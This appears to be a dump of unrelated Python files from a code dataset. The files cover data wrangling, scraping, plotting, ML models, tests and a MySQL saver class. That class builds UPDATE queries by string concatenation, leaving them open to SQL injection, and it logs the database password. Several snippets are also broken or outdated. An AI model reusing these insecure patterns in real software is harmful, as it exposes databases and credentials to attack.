serverName = '127.0.0.1'
serverPort = 12000
client = UDPClient()
message = input("Input lowercase sentence: ")
client.sendto(message.encode('utf-8'), (serverName, serverPort))
modifiedMessage, serverAddress = client.recvfrom(2048)
print(modifiedMessage.decode('utf-8'))
client.close()
|
410 | cd5945631a9dd505bf67089bab8c5a37ad375129 | import pandas as pd
df1 = pd.read_csv("../final/your_no.tsv", '\t')
df2 = pd.read_csv("../../Downloads/me.csv", '\t')
final = pd.concat([df1, df2])
final.to_csv('../../Downloads/final_con_final.tsv', sep='\t', index=False)
|
411 | 16b425d7b8cde1aabe038ccae6922091afb84415 |
# coding: utf-8
# In[1]:
import matplotlib.pyplot as plt
import matplotlib
import pandas as pd
import numpy as np
from pandas import DataFrame, Series
import os, re
# In[2]:
OUTPUT_EXCEL = '์๋ณ์๋ด์ฝํ์ฌ์ฉํํฉ.xlsx'
# In[3]:
# ๋ฐ์ดํ์
์ค๋น
data_source_dir = '์ฌ์ฉ๋์๋ณํต๊ณ/์๋ด'
dfs = []
for fname in os.listdir(data_source_dir):
fn, ext = os.path.splitext(fname)
if ext in ['.xls', '.xlsx']:
df = pd.read_excel(os.path.join(data_source_dir, fname))
df['์ฌ์ฉ(๊ฐ์)๋
์'] = fn
dfs.append(df)
use_amount_df = pd.concat(dfs, ignore_index=True)
# In[4]:
drug_standard_df = pd.read_json('drug.json').T
drug_info_df = pd.read_excel('์ฝํ์ ๋ณด.xls')
use_amount_df = pd.merge(drug_info_df, use_amount_df[['์ฌ์ฉ๋', '์ฝํ์ฝ๋', '์ฌ์ฉ(๊ฐ์)๋
์']], on='์ฝํ์ฝ๋', how='left')
use_amount_df = pd.merge(use_amount_df, drug_standard_df[['๋ณดํ์ฝ๋', '์ ํ๋ช
', 'ํ๋งค์ฌ', '์ฑ๋ถ/ํจ๋']], left_on='EDI์ฝ๋', right_on='๋ณดํ์ฝ๋', how='left')
use_amount_df['์ ํ๋ช
'] = use_amount_df['์ ํ๋ช
'].fillna(use_amount_df['์ฝํ๋ช
(ํ๊ธ)'])
use_amount_df['์ฌ์ฉ๊ฐ์๋
์'] = use_amount_df['์๊ฐ์์์ผ์'].map(lambda x: str(x)[0:4]+'-'+str(x)[4:6])
use_amount_df['์ฌ์ฉ(๊ฐ์)๋
์'] = use_amount_df['์ฌ์ฉ(๊ฐ์)๋
์'].fillna(use_amount_df['์ฌ์ฉ๊ฐ์๋
์'])
use_amount_df['์ฑ๋ถ๋ช
'] = use_amount_df['์ฑ๋ถ๋ช
'].fillna(use_amount_df['์ฑ๋ถ/ํจ๋'])
use_amount_df['์๋ด/์์ธ ์ฒ๋ฐฉ๊ตฌ๋ถ'] = use_amount_df['์๋ด/์์ธ ์ฒ๋ฐฉ๊ตฌ๋ถ'].map({1: '์์ธ', 2: '์์ธ/์๋ด', 3: '์๋ด'})
use_amount_df['์ฝํ๋ฒ์ ๊ตฌ๋ถ'] = use_amount_df['์ฝํ๋ฒ์ ๊ตฌ๋ถ'].map({0: '์ผ๋ฐ', 1: '๋ง์ฝ', 2: 'ํฅ์ ์ฝ', 3: '๋
์ฝ', 4: 'ํ๋ฐฉ์ฝ', 5: '๊ณ ๊ฐ์ฝ'})
# In[5]:
def get_last(s):
try:
return max(s)
except:
return s
# In[6]:
months = use_amount_df['์ฌ์ฉ(๊ฐ์)๋
์'].unique()
months = sorted(months.tolist(), reverse=1)
use_amount_df['์ตํ์ฌ์ฉ์'] = use_amount_df.groupby(['์ ํ๋ช
'])['์ฌ์ฉ(๊ฐ์)๋
์'].transform(get_last)
use_amount_df['์ต๊ทผ๋ฏธ์ฌ์ฉ์์'] = use_amount_df['์ตํ์ฌ์ฉ์'].map(lambda x: months.index(x) if x in months else -1)
# In[7]:
use_amount_in_df = use_amount_df[use_amount_df['์๋ด/์์ธ ์ฒ๋ฐฉ๊ตฌ๋ถ'] != '์์ธ']
# In[8]:
use_amount_in_df['์ฌ์ฉ๋'] = use_amount_in_df['์ฌ์ฉ๋'].fillna('์คํํ๋ฏธ์ฌ์ฉ')
# In[9]:
pat = '(\(([^\d].*?)\)+\s*)|ํด์ฅ๋ฐฉ์ง\s*|์์ฐ์๊ฐ๋ณด์ ,*\s*|์ฌ์ฉ์ฅ๋ ค(๋น\s*\d+์|๋ฐ|๋น์ฉ์ง๊ธ,*\s*)'
use_amount_in_df = use_amount_in_df.rename(columns={'์ ํ๋ช
': '์ฝํ๋ช
(๋๋ญ์ธํฌ)', '์ฝํ๋ช
(ํ๊ธ)': '์ฝํ๋ช
(์๋ด)'})
use_amount_in_df['์ฝํ๋ช
(๋๋ญ์ธํฌ)'] = use_amount_in_df['์ฝํ๋ช
(๋๋ญ์ธํฌ)'].str.replace(pat, '')
# In[10]:
pvt = use_amount_in_df.pivot_table(index = ['EDI์ฝ๋','์ฝํ๋ช
(๋๋ญ์ธํฌ)', '์ฑ๋ถ๋ช
','์ฝํ์ฝ๋','์ฝํ๋ช
(์๋ด)','ํจ๋ฅ์ฝ๋๋ช
','๊ท๊ฒฉ๋จ์', '์ต๊ทผ๋ฏธ์ฌ์ฉ์์'], columns=['์ฌ์ฉ(๊ฐ์)๋
์'], values=['์ฌ์ฉ๋'], aggfunc=sum)
# In[11]:
pvt.to_excel(OUTPUT_EXCEL)
os.startfile(OUTPUT_EXCEL)
# In[ ]:
|
412 | 0eaaa81d3c8bc61368701e1916b42ede88b90d04 | # EXERCISE:
# Plotting distributions pairwise (2)
# In this exercise, you will generate pairwise joint distributions again. This time, you will make two particular
# additions:
# - You will display regressions as well as scatter plots in the off-diagonal subplots. You will do this with the
# argument kind='reg' (where 'reg' means 'regression'). Another option for kind is 'scatter' (the default) that
# plots scatter plots in the off-diagonal subplots.
# - You will also visualize the joint distributions separated by continent of origin. You will do this with the
# keyword argument hue specifying the 'origin'.
# INSTRUCTIONS:
# - Plot the pairwise joint distributions separated by continent of origin and display the regressions.
# CODE:
# Print the first 5 rows of the DataFrame
print(auto.head())
# Plot the pairwise joint distributions grouped by 'origin' along with regression lines
sns.pairplot(auto, kind='reg', hue='origin')
# Display the plot
plt.show()
|
413 | 27e9635adf6109f3ab13b9d8dd5809973b61ca03 | #Web Scraping
#Make sure you have bs4, webbrowser and request installed as your third party modules
import bs4, webbrowser, requests
try:
data = requests.get("http://en.wikipedia.org/wiki/Python")
data.raise_for_status()
my_data = bs4.BeautifulSoup(data.text, "lxml")
print("List of all the header tags: \n\n")
for the_data in my_data.find_all("a"):
try:
print(the_data.attrs["href"])
except Exception as err:
print(err)
except Exception as err:
print(err)
print("\nNo website matches your search.")
|
414 | f5f26819be4b98fab3d46e57e1a5431e54342aed |
# coding: utf-8
"""Supporting model logic for predicting emotional content of user input.
"""
import pandas as pd
import gensim
from sklearn.model_selection import train_test_split
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
#load data for emo2vec
loc = 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'
print("loading & cleaning the data...")
em_words = pd.read_csv(loc, sep='\t', names=['annotator_id',
'remove',
'word',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS'])
em_words.drop('remove', axis=1, inplace=True)
em_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str
em_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str
em_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str
em_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str
em_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str
em_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str
em_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str
em_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-').str
em_words['toss8'], em_words['anticipation'] = em_words['anticipation'].str.split('-').str
em_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str
em_words.drop(['toss1','toss2','toss3','toss4','toss5','toss6','toss7','toss8','toss9'],
axis=1,
inplace=True)
new_cols = ['annotator_id',
'word','synonym',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS']
em_words = em_words.reindex_axis(new_cols, axis=1)
emotions = em_words[['joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation']]
em_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)
affected = em_words[emotions.columns].groupby([em_words['word']], sort=False).mean().reset_index()
# Load Google's pre-trained Word2Vec model.
print('training the word2vec model from google\'s corpus')
model = gensim.models.Word2Vec.load_word2vec_format('../GoogleNews-vectors-negative300.bin', binary=True)
# create list of word indicies to drop to avoid keyerrors with Google's pre-trained model.
idx_to_drop = []
def dropper():
for ex in affected['word']:
if ex not in model.vocab:
idx_to_drop.append(affected.loc[affected.word == ex].index[0])
# drop words from affected that are not in google's model
dropper()
affected = affected.drop(idx_to_drop, axis=0)
G_vectors = lambda x: model[x]
affected['word_vectors'] = affected['word'].apply(G_vectors)
affected['label_vectors'] = affected[emotions.columns].values.tolist()
affected['binary'] = (affected[emotions.columns] > 0).astype(int).values.tolist()
df1 = affected[emotions.columns].rank(method='max', axis=1).rank(method='first', axis=1)
ma = df1.max().max()
affected['label'] = (df1== ma).astype(int).values.tolist()
affected['target'] = affected['label'].apply(lambda x: x.index(1))
label_dict = {0 : 'joy',
1 : 'sadness',
2 : 'fear',
3 : 'anger',
4 : 'trust',
5 : 'disgust',
6 : 'surprise',
7 : 'anticipation'}
affected['label_name'] = affected['target'].apply(lambda x: label_dict[x])
emo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label', 'target', 'label_name']]
# # Model Testing
print("splitting into train/test groups...")
emo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)
emo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X, emo_y, random_state=42)
# ### OnevsRest with LinearSVC (best score)
print("creating a model with the best stuff we've got...")
OVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)
emo_model = OVR.fit(emo_X_train, emo_y_train)
|
415 | d2e46944ab05c5e8c1979101728b7b25900be342 | import pytest
from time import sleep
from timeflux.helpers.background import Task
class DummyWorker():
def echo(self, message='hello', delay=0, fail=False):
sleep(delay)
if fail: raise Exception('failed')
self.message = message
return(self.message)
def test_default(working_path):
task = Task(DummyWorker(), 'echo').start()
while not task.done:
status = task.status()
assert status['result'] == 'hello'
assert status['instance'].message == 'hello'
def test_args(working_path):
task = Task(DummyWorker(), 'echo', 'foobar').start()
while not task.done:
status = task.status()
assert status['result'] == 'foobar'
def test_kwargs(working_path):
task = Task(DummyWorker(), 'echo', message='foobar').start()
while not task.done:
status = task.status()
assert status['result'] == 'foobar'
def test_exception(working_path):
task = Task(DummyWorker(), 'echo', fail=True).start()
while not task.done:
status = task.status()
assert status['success'] == False
assert status['exception'].args[0] == 'failed'
def test_stop_running(working_path):
task = Task(DummyWorker(), 'echo', delay=5).start()
sleep(.5)
assert task.done == False
task.stop()
assert task.done == True
def test_stop_not_running(working_path):
task = Task(DummyWorker(), 'echo').start()
while not task.done:
status = task.status()
task.stop()
assert task.done == True
|
416 | b2f2f1e4b7070ac867b71e538f759e527eb1ffb9 | from pymouse import PyMouse
m = PyMouse()
w,h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self,xy:list):
'''
็งปๅจ
'''
m.move(xy[0]*w,xy[1]*h)
def click(self, xy:list):
'''
็นๅป
'''
m.click(xy[0]*w,xy[1]*h)
def scroll(self, marks:list):
'''
ๆปๅจ
'''
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy:list, ones = True):
'''
้ฟๆ
'''
if ones:
m.press(xy[0]*w,xy[1]*h)
else:
m.drag(xy[0]*w,xy[1]*h)
def release(self, xy:list):
'''
ๆพๅผ
'''
m.release(xy[0]*w,xy[1]*h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
|
417 | ec9efeca7eef7b8ee25c1e089e675bdb1e53413b | # -*- coding:utf-8 -*-
# Author: washing
# DateTime: 2022/5/18 10:28
# File: 0668.py
# Desc: CV
class Solution:
def findKthNumber(self, m: int, n: int, k: int) -> int:
return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(x // i for i in range(x // n + 1, m + 1)))
|
418 | 13342922022f0a0e8928c81c1c4716125af0b2c4 | import matplotlib.pyplot as plt
import numpy as np
plt.rcParams['savefig.dpi'] = 300 #ๅพ็ๅ็ด
plt.rcParams['figure.dpi'] = 300 #ๅ่พจ็
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus'] = False
x_axis = [20,40,60,80,100]
rf = [184,174,166,159,157.5]
anns = [186,179,170,164,161]
adaboost = [187.5,176,172,163,162]
x = np.arange(len(x_axis)) #้ฆๅ
็จ็ฌฌไธไธช็้ฟๅบฆไฝไธบๆจชๅๆ
width = 0.2 #่ฎพ็ฝฎๆฑไธๆฑไน้ด็ๅฎฝๅบฆ
fig,ax = plt.subplots()
p_rf = ax.bar(x-width,rf,width,alpha = 0.9,)
p_anns = ax.bar(x,anns,width,alpha = 0.9,color= 'red')
p_adaboost = ax.bar(x+width,adaboost,width,alpha = 0.9,color= 'green')
ax.set_xticks(x +width/2)#ๅฐๅๆ ่ฎพ็ฝฎๅจๆๅฎไฝ็ฝฎ
ax.set_xticklabels(x_axis)#ๅฐๆจชๅๆ ๆฟๆขๆ
plt.legend((p_rf[0],p_anns[0],p_adaboost[0]),('RF','ANNs','AdaBoost'),loc='best',fontsize=20)
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
plt.ylim(150,200) # ๆๅฎY่ฝด็้ซๅบฆ
plt.xlabel('่ฎญ็ป้ๅคงๅฐ(%)',fontsize=20)
plt.ylabel('MAE(s)',fontsize=20)
plt.show()
#plt.savefig('MAE.png', dpi=3600) |
419 | cb08b95e3b9c80fb74d4415b3798ddbb36cd76e7 | import unittest
"""
Find the largest 0 to 9 pandigital that can be formed by concatenating products
Take the number 6 and multiply it by each of 1273 and 9854:
6 ร 1273 = 7638
6 ร 9854 = 59124
By concatenating these products we get the 1 to 9 pandigital 763859124. We will call 763859124 the "concatenated product of 6 and (1273,9854)". Notice too, that the concatenation of the input numbers, 612739854, is also 1 to 9 pandigital.
The same can be done for 0 to 9 pandigital numbers.
What is the largest 0 to 9 pandigital 10-digit concatenated product of an integer with two or more other integers, such that the concatenation of the input numbers is also a 0 to 9 pandigital 10-digit number?
"""
class Test(unittest.TestCase):
def test(self):
pass
|
420 | 63a40282f16a7f27c118594f1a9468749682594f | import requests
import os
from jpmesh import parse_mesh_code
from tqdm import tqdm
url_login='https://platform.openquake.org/account/login/'
client = requests.session()
client.get(url_login)
# Identification for openquake platform
login_data = {'username':'###','password':'###'}
r1=client.post(url_login,data=login_data)
def scrap_expo():
dir_names=os.listdir('Site Effects/')
for name in dir_names:
fcode = name.split('-')[-1]
mesh = parse_mesh_code(fcode)
sw = mesh.south_west
ne = sw+ mesh.size
lng1 = str(sw.lon.degree)
lng2 = str(ne.lon.degree)
lat1 = str(ne.lat.degree)
lat2 = str(sw.lat.degree)
for occ in ['residential', 'non-residential']:
url_add_run='http://platform.openquake.org/exposure/export_exposure?output_type=csv&sr_id=113&occupancy_filter='+occ+'&lng1='+lng1+'&lat1='+lat1+'&lng2='+lng2+'&lat2='+lat2
output = open('Exposure/'+occ+'/'+fcode+'.csv', 'wb')
print(fcode)
r2=client.get(url_add_run, stream=True)
for data in tqdm(r2.iter_content()):
output.write(data)
output.close()
print(r2.status_code)
def scrap_consequences():
eq_code = str(134)
url_add_run = 'https://platform.openquake.org/ecd/eventoverview/' + eq_code + '?&zoomtoextent=True&f_b=False&f_c=False&f_i=False&f_p=False&f_s=False&all=True'
file_name = 'Consequences/' + eq_code + '.txt'
output = open(file_name, 'wb')
print client
r2 = client.get(url_add_run, stream=True)
print r2.status_code
for data in tqdm(r2.iter_content()):
print data
output.write(data)
output.close()
data = open(file_name).readlines()
print data.split('')
# scrap_consequences() |
421 | e695b9458c0e98521e560dbb291f6f05bda1549f | from savers.saver import SaverInterface
import os
from config import SaverConfig
import mysql.connector
import json
import logging
class SQLSaver(SaverInterface):
# This class takes in json files and will interpret the jsons as follows.
# {'tablename':[{'columnname01':'somevalue','columnname02':'somevalue'},{'columnaname02':'somevalue'}]}
def connect(self):
self.logging.info("Logging to %s@%s:%s -p %s", self.config.SQL_USER, self.config.SQL_HOST, self.config.SQL_DATABASE, self.config.SQL_PASSWD)
self.db = mysql.connector.connect(host=self.config.SQL_HOST, user=self.config.SQL_USER, passwd=self.config.SQL_PASSWD, database=self.config.SQL_DATABASE, auth_plugin='mysql_native_password')
self.logging.info("Log in is successful")
def executesql(self, sqlstatement):
self.logging.debug("Executing %s", sqlstatement)
cursor=self.db.cursor()
cursor.execute(sqlstatement)
self.db.commit()
rowcount=cursor.rowcount
cursor.close()
return rowcount
def executesqlupdate(self,sqlstatement):
try:
self.logging.debug("Executing %s ", sqlstatement)
cursor=self.db.cursor()
cursor.execute(sqlstatement)
self.db.commit()
rowcount=cursor.rowcount
cursor.close()
except Exception as e:
self.logging.error("Problem executing SQL: %s", str(e))
def executesql(self, sqlstatement, data):
try:
self.logging.debug("Executing %s with data as follows %s", sqlstatement, data)
cursor=self.db.cursor()
cursor.execute(sqlstatement, data)
self.db.commit()
rowcount=cursor.rowcount
cursor.close()
except Exception as e:
self.logging.error("Problem executing SQL: %s", str(e))
rowcount=0
return rowcount
def querysql(self,sqlstatement):
print("Statements to execute\n",sqlstatement)
cursor=self.db.cursor()
cursor.execute(sqlstatement)
records = cursor.fetchall()
cursor.close()
return records
def __init__(self,config=None):
if config == None:
self.config = SaverConfig()
logging.basicConfig(level=logging.DEBUG,handlers=[
logging.FileHandler("{0}/{1}.log".format("/logs", "saverservice-sqlsaver")),
logging.StreamHandler()
],
format="%(asctime)-15s %(levelname)-8s %(message)s")
self.logging=logging
self.connect()
def freequery(self, sqlstring):
records=self.querysql(sqlstring)
return records
def create(self, jsonobject):
try:
self.logging.info("Starting create operations")
if isinstance(jsonobject, str):
self.logging.debug("data obj received is not json, manually converting")
jsonobject = json.loads(jsonobject)
dictkeys= jsonobject.keys()
totalrowcount=0
for tablename in dictkeys:
rowstoadd=jsonobject[tablename]
self.logging.debug("Table: %s Rows: %s",tablename, rowstoadd)
sqlstatementcolnames=""
sqlstatementcolvalues=""
for row in rowstoadd:
print("Row:{}".format(row))
dictcolsinrow=row.keys()
print("ColumnNames: {}".format(dictcolsinrow))
colCount=0
datalist=[]
for col in dictcolsinrow:
self.logging.debug("Col:%s,Val:%s",col,row[col])
if colCount==0:
sqlstatementcolnames=col
#sqlstatementcolvalues="\'"+str(row[col])+"\'"
sqlstatementcolvalues="%s"
datalist.append(str(row[col]))
else:
sqlstatementcolnames=sqlstatementcolnames+','+col
#sqlstatementcolvalues=sqlstatementcolvalues+','+"\'"+str(row[col])+"\'"
sqlstatementcolvalues=sqlstatementcolvalues+",%s"
datalist.append(str(row[col]))
colCount=colCount+1
sqlstatement="INSERT INTO " + tablename + "(" + sqlstatementcolnames + ") VALUES (" + sqlstatementcolvalues + ")"
rowcount=self.executesql(sqlstatement, datalist)
totalrowcount=totalrowcount+rowcount
except Exception as e:
totalrowcount=0
return totalrowcount
def update(self,jsonobject):
#Expects the following json
#{"tablename":[
#{"row":
#{"data":{"columnname02":"01value","columnname02":"02value"},"condition":{"columnname03":"03value"}}},
#{"row":
#{"data":{"columnname04":"04value","columnname05":"05value"},"condition":{"columnname06":"06value"}}}
#]}
dictkeys= (jsonobject.keys())
print("Dict keys:",dictkeys)
sqlstatements=[]
for tablename in dictkeys:
rowstoupdate=jsonobject[tablename]
print("Table: {}\nRows:{}".format(tablename,rowstoupdate))
for rowtoupdate in rowstoupdate:
rowdata=rowtoupdate['row']['data']
rowcondition=rowtoupdate['row']['condition']
print("ROW:\n\tRowData:{}\n\tRowCondition:{}".format(rowdata,rowcondition))
sqlstatementdata=""
colCount=0
for colname in rowdata.keys():
if colCount==0:
sqlstatementdata = colname+"="+"\'"+str(rowdata[colname])+"\'"
else:
sqlstatementdata = sqlstatementdata+","+colname+"="+"\'"+str(rowdata[colname])+"\'"
colCount=colCount+1
sqlstatementcondition=""
colCount=0
for colname in rowcondition.keys():
if colCount==0:
sqlstatementcondition=colname+"="+"\'"+str(rowcondition[colname])+"\'"
else:
sqlstatementcondition=sqlstatementcondition+" AND "+ colname+"="+"\'"+str(rowcondition[colname])+"\'"
colCount=colCount+1
sqlstatement="UPDATE " + tablename + " SET " + sqlstatementdata + " WHERE " + sqlstatementcondition
sqlstatements.append(sqlstatement)
self.executesql(sqlstatements)
def setreportstatus(self,filename,status):
sqlstring="UPDATE reports SET currentloc='" + status.upper() + "' WHERE filename='" + filename.lower()+"'"
self.executesqlupdate(sqlstring)
def get(self):
super.get()
def delete(self):
super.delete()
if __name__=="__main__":
jsonobj = json.load(open("create_report.json","r"))
saver = SQLSaver()
saver.create(jsonobj)
jsonobj=json.load(open("create_ingest.json","r"))
saver.create(jsonobj)
jsonobj=json.load(open("update_ingest.json","r"))
saver.update(jsonobj)
# rowsreportsaffected=saver.save({'reports':[{'filename':'file01.pdf','created_at':'2020-01-09 15:00:00','ingested_at':'2020-01-09 15:01:00','currentloc':'/home/shareddata'},{'filename':'file02.pdf','created_at':'2020-01-09 16:00:00','ingested_at':'2020-01-09 16:01:00','currentloc':'/home/shareddata'}])
# rowsingestsaffected=saver.save({'ingests':[{'text':'This is good weather?','section':'observation','created_at':'2020-01-02 12:33:33','ingest_id':'1','predicted_category':'DOCTRINE','annotated_category':'DOCTRINE'}]})
# rowsingestupdate=save.update({'ingests':[{'id':'1','annotated_category':'PERSONNEL'}]})
pass
|
422 | c55991e738c89ee09dabd79d514e710e0fcbac85 | from splinter import Browser
from time import sleep
from datetime import datetime, timedelta
import os, sys
import urllib
import cv2
import numpy as np
from PIL import Image
import imutils
import csv
class Scraper():
start_date = datetime(2018, 1, 8)
url = 'http://spaceweather.com/'
def scrape(self):
self.browser = Browser('firefox')
self.browser.driver.set_page_load_timeout(60)
self.browser.visit(self.url)
for day in self.get_days():
self.scrape_day(day)
def scrape_day(self, day):
self.browser.select('month', day.strftime('%m'))
self.browser.select('day', day.strftime('%d'))
self.browser.select('year', day.strftime('%Y'))
button = self.browser.find_by_name('view')
button.click()
text = self.browser.find_by_css('.solarWindText')[4].text
number = int(text.split(' ')[2].strip())
link = self.browser.find_link_by_partial_href('images{}/'.format(day.strftime('%Y')))['href']
folder_name = "data/{}{}{}".format(day.strftime('%Y'), day.strftime('%m'), day.strftime('%d'))
image_name = "{}/image.gif".format(folder_name)
txt_name = "{}/data.txt".format(folder_name)
os.mkdir(folder_name)
urllib.urlretrieve(link, image_name)
img = Image.open(image_name)
img.save("{}/image.png".format(folder_name), 'png', optimize=True, quality=70)
txt_file = open(txt_name, 'w')
txt_file.write(str(number))
txt_file.close()
print("Downloaded data for {}, sunspots: {}".format(day.strftime('%m/%d/%Y'), number))
def get_days(self):
days = []
for i in range(0, 8):
base = self.start_date + timedelta(days=7 * i)
first = base
second = base + timedelta(days=2)
third = base + timedelta(days=4)
days.append(first)
days.append(second)
days.append(third)
return days
class Entry():
folder = None
date = None
sunspots = -1
image_path = None
counted_sunspots = 0
sections = [0, 0, 0, 0]
def nothing(self, *arg):
pass
def __init__(self, folder, date, sunspots, image_path):
self.folder = folder
self.date = date
self.sunspots = sunspots
self.image_path = image_path
def process(self):
frame = cv2.imread(self.image_path)
height, width, channels = frame.shape
frameBGR = cv2.GaussianBlur(frame, (1, 1), 0)
hsv = cv2.cvtColor(frameBGR, cv2.COLOR_BGR2HSV)
colorLow = np.array([0,90,80])
colorHigh = np.array([10,255,255])
mask = cv2.inRange(hsv, colorLow, colorHigh)
result = cv2.bitwise_and(frame, frame, mask=mask)
image_edged = cv2.Canny(mask, 50, 100)
image_edged = cv2.dilate(image_edged, None, iterations=1)
image_edged = cv2.erode(image_edged, None, iterations=1)
cnts = cv2.findContours(image_edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
image_contours = cv2.bitwise_not(result)
self.counted_sunspots = 0
self.sections = [0, 0, 0, 0]
section_1_start, section_1_end = 0, height/4
section_2_start, section_2_end = height/4, height/4 * 2
section_3_start, section_3_end = height/4 * 2, height/4 * 3
section_4_start, section_4_end = height/4 * 3, height/4 * 4
cv2.line(image_contours, (0, section_1_end), (width, section_1_end), (0, 0, 0), 5)
cv2.line(image_contours, (0, section_2_end), (width, section_2_end), (0, 0, 0), 10)
cv2.line(image_contours, (0, section_3_end), (width, section_3_end), (0, 0, 0), 5)
cv2.circle(image_contours, (width/2, height/2), width/2, (0, 0, 0), 5)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(image_contours, self.date.strftime('%a %b %d'), (20, 50), font, 2, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, self.date.strftime('SSN: {}'.format(self.sunspots)), (20, 100), font, 1.5, (0, 0, 0), 2, cv2.LINE_AA)
for c in cnts:
if cv2.contourArea(c) < 5:
continue
(x,y),radius = cv2.minEnclosingCircle(c)
x = int(x)
y = int(y)
radius = int(radius)
cv2.circle(image_contours, (x, y), radius, (100, 100, 255), -1)
self.counted_sunspots = self.counted_sunspots + 1
if y >= section_1_start and y <= section_1_end:
#cv2.putText(image_contours, '1', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[0] = self.sections[0] + 1
elif y >= section_2_start and y <= section_2_end:
#cv2.putText(image_contours, '2', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[1] = self.sections[1] + 1
elif y >= section_3_start and y <= section_3_end:
#cv2.putText(image_contours, '3', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[2] = self.sections[2] + 1
elif y >= section_4_start and y <= section_4_end:
#cv2.putText(image_contours, '4', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[3] = self.sections[3] + 1
print('Counted sunspots: {}'.format(self.counted_sunspots))
print(self.sections)
cv2.putText(image_contours, 'Section 1: {}'.format(self.sections[0]), (20, 130), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, 'Section 2: {}'.format(self.sections[1]), (20, 160), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, 'Section 3: {}'.format(self.sections[2]), (20, 190), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, 'Section 4: {}'.format(self.sections[3]), (20, 220), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
colorLow = np.array([0,0,90])
colorHigh = np.array([0,0,255])
mask = cv2.inRange(hsv, colorLow, colorHigh)
image_contours[mask > 0] = (0, 0, 0)
vis = np.concatenate((frame, image_contours), axis=1)
cv2.imwrite('out/images/{}.png'.format(self.folder), vis)
class Processor():
entries = []
def load(self):
folders = os.listdir("data")
for folder in folders:
year = int(folder[:4])
month = int(folder[4:6])
day = int(folder[6:8])
date = datetime(year, month, day)
image_name = "data/{}/image.png".format(folder)
txt_name = "data/{}/data.txt".format(folder)
txt_file = open(txt_name, 'r')
content = txt_file.readlines()
txt_file.close()
number = int(content[0])
print(folder)
entry = Entry(folder, date, number, image_name)
entry.process()
self.entries.append(entry)
self.entries.sort(key=lambda x: x.date, reverse=False)
def compute(self):
for section in range(0, 4):
total = 0
for entry in self.entries:
total += entry.sections[section]
average = float(total) / float(len(self.entries))
print('-------[Section {}]-------'.format(section + 1))
print('Total: {}'.format(total))
print('Average: {}'.format(average))
total = 0
sections_data = [["date", "section_1", "section_2", "section_3", "section_4"]]
numbers_data = [["date", "reported", "visible"]]
for entry in self.entries:
total += entry.counted_sunspots
sections_data.append([entry.date.strftime("%Y/%m/%d")] + entry.sections)
numbers_data.append([entry.date.strftime("%Y/%m/%d")] + [entry.sunspots, entry.counted_sunspots])
average = float(total) / float(len(self.entries))
print('---------[TOTAL]---------')
print('Total: {}'.format(total))
print('Average: {}'.format(average))
csv_file = open('out/sections.csv', 'w')
writer = csv.writer(csv_file)
writer.writerows(sections_data)
csv_file.close()
csv_file = open('out/numbers.csv', 'w')
writer = csv.writer(csv_file)
writer.writerows(numbers_data)
csv_file.close()
scraper = Scraper()
scraper.scrape()
processor = Processor()
processor.load()
processor.compute() |
423 | b767519229058b50183d78bb97121f050e5b6bad | # defining private variables
class Privacy:
def __init__(self, val):
self.__val = 900;
print("Private data member =",self.__val,"\n")
value = Privacy(800);
print("Value not changable\n")
value.__val;
|
424 | b679444fde7cd8eb819443922f37ee54c0f29de4 | from pirates.teleport.AreaTeleportActor import AreaTeleportActor
class DoorTeleportActor(AreaTeleportActor):
pass
|
425 | f714c7006f50379cc7508a13d710d902d38d2d1f | import torch
import torch.nn as nn
import torch.nn.functional as F
# Const. low-rank version
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1, groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels//groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters//self.times, channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters-filters//self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters//self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
